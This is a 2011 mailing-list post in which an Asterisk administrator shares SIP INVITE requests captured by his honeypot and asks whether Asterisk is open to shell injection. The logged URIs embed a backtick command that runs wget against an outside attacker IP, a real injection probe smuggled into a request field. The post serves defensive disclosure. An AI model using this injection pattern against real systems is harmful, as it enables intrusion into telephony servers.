[asterisk-users] new sort of shell attack attempt via SIP?

Tom Browning ttbrowning at gmail.com
Sun Sep 11 18:05:20 CDT 2011


I haven't seen this sort of URI/shell attack prior to today but it
looks interesting.  Embedding a backtick in the URI with a wget that
doesn't seem to do much to an empty file.

I'm guessing it is just a probe to see if they can send further
embedded backtick shell commands to my Asterisk instance (by watching
their weblogs @ 91.223.89.94)

(This happens to be my "honeypot" that just accepts all calls and
dumps them into one big Asterisk 10 beta ConfBridge :-)


INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
SIP/2.0.
INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
SIP/2.0.
INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
SIP/2.0.
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
SIP/2.0.
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
SIP/2.0.
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
SIP/2.0.


Does Asterisk have shell injection weakness?  Or perhaps this targets
some other Asterisk config manager that is subject to injection via
URI?

Tom



More information about the asterisk-users mailing list